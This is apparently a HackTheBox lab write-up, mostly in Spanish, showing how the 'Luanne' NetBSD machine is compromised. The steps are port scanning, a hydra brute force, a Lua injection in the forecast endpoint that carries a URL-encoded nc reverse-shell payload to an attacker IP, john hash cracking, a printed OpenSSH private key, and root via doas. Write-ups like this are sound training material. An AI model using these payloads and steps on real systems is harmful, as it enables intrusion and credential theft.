Welcome to the Luanne writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Luanne

tags: HTB Easy Linux
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeración

Nmap

kali@kali:$ sudo nmap -sS -p- -T5 -n --open  10.129.45.136 -oN AllPorts.txt
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-30 16:05 EST
Nmap scan report for 10.129.45.136
Host is up (0.044s latency).
Not shown: 62334 filtered ports, 3198 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9001/tcp open  tor-orport

Nmap done: 1 IP address (1 host up) scanned in 32.08 seconds
kali@kali:$ sudo nmap -sC -sV -p22,80,9001 -n -T5 10.129.45.136 -oN PortsInDepth.txt
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_  256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp   open  http    nginx 1.19.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-robots.txt: 1 disallowed entry 
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Port 9001

Port 80
También necesitas contraseña.

Sin embargo, te permite acceder al fichero robots.txt http://10.129.45.136/robots.txt

User-agent: *
Disallow: /weather  #returning 404 but still harvesting cities 

Usando dirbuster aparecen los siguientes directorios

kali@kali:$ gobuster dir -t 20 -u http://10.129.45.136/weather/ -w /u
sr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.129.45.136/weather/
[+] Threads:        20
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/11/30 18:02:37 Starting gobuster
===============================================================
/forecast (Status: 200)
===============================================================
2020/11/30 18:22:58 Finished
===============================================================



Sending random characters appears the following error.

http://10.129.45.136/weather/forecast?city=list

kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ hydra -I -l user -P /usr/share/wordlists/rockyou.txt -s 9001 -f 10.129.45.136 http-get /
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-30 19:00:50
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.129.45.136:9001/
[9001][http-get] host: 10.129.45.136   login: user   password: 123
[STATUS] attack finished for 10.129.45.136 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-30 19:01:35


Exploit

Modificar la Ip y puerto

http://luanne.htb/weather/forecast?city=London%27%29%3Bos.execute%28%22rm%20%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.XX.XX%20PUERTO%20%3E%2Ftmp%2Ff%22%29--
$ ls -la
total 20
drwxr-xr-x   2 root  wheel  512 Nov 25 11:27 .
drwxr-xr-x  24 root  wheel  512 Nov 24 09:55 ..
-rw-r--r--   1 root  wheel   47 Sep 16 15:07 .htpasswd
-rw-r--r--   1 root  wheel  386 Sep 17 20:56 index.html
-rw-r--r--   1 root  wheel   78 Nov 25 11:38 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

utlizando hashid obtengo el siguiente tipo

kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ hashid htpasswd 
--File 'htpasswd'--
Analyzing '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0'
[+] MD5 Crypt 
[+] Cisco-IOS(MD5) 
[+] FreeBSD MD5 

Utilizando john la saca en un momento

kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ john htpasswd -w=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iamthebest       (?)
1g 0:00:00:00 DONE (2020-12-01 16:11) 9.090g/s 27490p/s 27490c/s 27490C/s secrets..iamcool
Use the "--show" option to display all of the cracked passwords reliably
Session completed

La credencial resultante sería

webapi_user:iamthebest

Solo existe un usuario.

total 1.5K                                                                                                                                                                                                       
drwxr-xr-x   3 root        wheel  512B Sep 14 06:46 .                                                                                                                                                            
drwxr-xr-x  21 root        wheel  512B Sep 16 22:05 ..                                                                                                                                                           
dr-xr-x---   7 r.michaels  users  512B Sep 16 18:20 r.michaels

En la web http://luanne.htb:9001/logtail/processes

El usuario y la contraseña son:

user:123

Encontramos los procesos que se estan ejecutando:

USER         PID %CPU %MEM    VSZ   RSS TTY   STAT STARTED    TIME COMMAND
root           0  0.0  0.1      0  6136 ?     DKl   9:29PM 0:02.54 [system]
root           1  0.0  0.0  19852  1520 ?     Ss    9:29PM 0:01.51 init 
root         163  0.0  0.0  32508  2324 ?     Ss    9:29PM 0:34.35 /usr/sbin/syslogd -s 
r.michaels   185  0.0  0.0  34992  1976 ?     Is    9:30PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www 
root         298  0.0  0.0  20140  1332 ?     Is    9:29PM 0:00.00 /usr/sbin/powerd 
root         299  0.0  0.0  33424  1836 ?     Is    9:30PM 0:00.00 nginx: master process /usr/pkg/sbin/nginx 
_httpd       336  0.0  0.3 119324 17232 ?     Ss    9:30PM 0:02.24 /usr/pkg/bin/python3.8 /usr/pkg/bin/supervisord-3.8 
root         348  0.0  0.0  71348  2972 ?     Ss    9:30PM 0:25.50 /usr/sbin/sshd 
nginx        373  0.0  0.1  33932  3364 ?     I     9:30PM 0:07.82 nginx: worker process 
_httpd       376  0.0  0.0  34952  2012 ?     Is    9:30PM 0:01.90 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www 
root         402  0.0  0.0  20216  1656 ?     Ss    9:30PM 0:00.02 /usr/sbin/cron 
_httpd     12176  0.0  0.0  17596  1128 ?     O    11:01PM 0:00.00 /usr/bin/egrep ^USER| \\[system\\] *$| init *$| /usr/sbin/sshd *$| /usr/sbin/syslogd -s *$| /usr/pkg/bin/python3.8 /usr/pkg/bin/supervisord-3.8 *$| /usr/sbin/cron *$| /usr/sbin/powerd *$| /usr/libexec/httpd -u -X -s.*$|^root.* login *$| /usr/libexec/getty Pc ttyE.*$| nginx.*process.*$ 
_httpd     29239  0.0  0.0  35252  2320 ?     I    10:12PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www 
_httpd     29841  0.0  0.0  35252  2320 ?     I    10:55PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www 
root         421  0.0  0.0  21652  1580 ttyE1 Is+   9:30PM 0:00.00 /usr/libexec/getty Pc ttyE1 
root         388  0.0  0.0  19780  1584 ttyE2 Is+   9:30PM 0:00.00 /usr/libexec/getty Pc ttyE2 
root         433  0.0  0.0  19780  1580 ttyE3 Is+   9:30PM 0:00.00 /usr/libexec/getty Pc ttyE3 

Entre ellos encontramos un nuevo proceso web ejecutado r.michaels.

r.michaels   185  0.0  0.0  34992  1976 ?     Is    9:30PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www 

Aquí esta la web que hace referencia a https://man.netbsd.org/httpd.8

El parámetro -u "Causes bozohttpd to switch to the user and the groups of username after. This option, like -t above,causes bozohttpd to clear the environment unless the -e option is given." por lo que tendremos acceso a la carpeta de r.michael.

curl -i -u webapi_user:iamthebest http://localhost:3001/~r.michaels/                                                                                                                                                                       
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                                                                                                                                            
                                 Dload  Upload   Total   Spent    Left  Speed                                                                                                                                                              
100   601    0   601    0     0   293k      0 --:--:-- --:--:-- --:--:--  293k                                                                                                                                                             
HTTP/1.1 200 OK                                                                                                                                                                                                                            
Date: Fri, 04 Dec 2020 15:27:19 GMT                                                                                                                                                                                                        
Server: bozohttpd/20190228                                                                                                                                                                                                                 
Accept-Ranges: bytes                                                                                                                                                                                                                       
Content-Type: text/html                                                                                                                                                                                                                    
Connection: close                                                                                                                                                                                                                          

<!DOCTYPE html>                                                                                                                                                                                                                            
<html><head><meta charset="utf-8"/>                                                                                                                                                                                                        
<style type="text/css">                                                                                                                                                                                                                    
table {                                                                                                                                                                                                                                    
        border-top: 1px solid black;                                                                                                                                                                                                       
        border-bottom: 1px solid black;                                                                                                                                                                                                    
}                                                                                                                                                                                                                                          
th { background: aquamarine; }                                                                                                                                                                                                             
tr:nth-child(even) { background: lavender; }                                                                                                                                                                                               
</style>                                                                                                                                                                                                                                   
<title>Index of ~r.michaels/</title></head>                                                                                                                                                                                                
<body><h1>Index of ~r.michaels/</h1>                                                                                                                                                                                                       
<table cols=3>                                                                                                                                                                                                                             
<thead>                                                                                                                                                                                                                                    
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>

Existe una clave id_rsa en el directorio (La de michael)

curl -i -u webapi_user:iamthebest http://localhost:3001/~r.michaels/id_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2610  100  2610    0     0   849k      0 --:--:-- --:--:-- --:--:--  849k
HTTP/1.1 200 OK
Date: Fri, 04 Dec 2020 15:27:39 GMT
Server: bozohttpd/20190228
Accept-Ranges: bytes
Last-Modified: Wed, 16 Sep 2020 16:52:06 GMT
Content-Type: text/plain
Content-Length: 2610
Connection: close

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Privilege Escalation

Dentro del directorio home del usuario encontramos otro directorio llamado backups, y dentro devel_backup-2020-09-16.tar.gz.enc el cual está encriptado usando pgp. Si listo los binarios disponibles en el sistema, encuentro que está disponible /usr/bin/netpgp el cual podemos usar para desencriptar le archivo usando lo siguiente.

$ netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/devel_backup-2020-09-16.tar.gz

Dentro de la carpeta se encuentra otro fichero .htpasswd con otra contraseña diferente.

# john -w=/usr/share/wordlists/rockyou.txt .htpasswd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littlebear       (webapi_user)
1g 0:00:00:00 DONE (2020-12-04 16:53) 4.166g/s 54400p/s 54400c/s 54400C/s gamboa..hello11
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Por lo que veo, no podemos hacer ni su ni sudo al ser NetBSD.

luanne$ su toor
su: You are not listed in the correct secondary group (wheel) to su toor.
su: Sorry: Authentication error

Voy a listar los SUID.

luanne$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/at
/usr/bin/atq
/usr/bin/atrm
/usr/bin/batch
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/lock
/usr/bin/login
/usr/bin/lpq
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/rlogin
/usr/bin/skeyinfo
/usr/bin/skeyinit
/usr/bin/su
/usr/bin/yppasswd
/usr/libexec/mail.local
/usr/libexec/ssh-keysign
/usr/libexec/utmp_update
/usr/sbin/authpf
/usr/sbin/mrinfo
/usr/sbin/mtrace
/usr/sbin/pppd
/usr/sbin/sliplogin
/usr/sbin/traceroute
/usr/sbin/traceroute6
/usr/pkg/bin/doas
/usr/pkg/libexec/dbus-daemon-launch-helper
/bin/rcmd
/sbin/ping
/sbin/ping6
/sbin/shutdown

Creo que podemos usar /usr/pkg/bin/doas para ello ya que tiene la misma funcionalidad que su

luanne$ doas -u toor /bin/sh
Password:
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
#

Y ya somos root.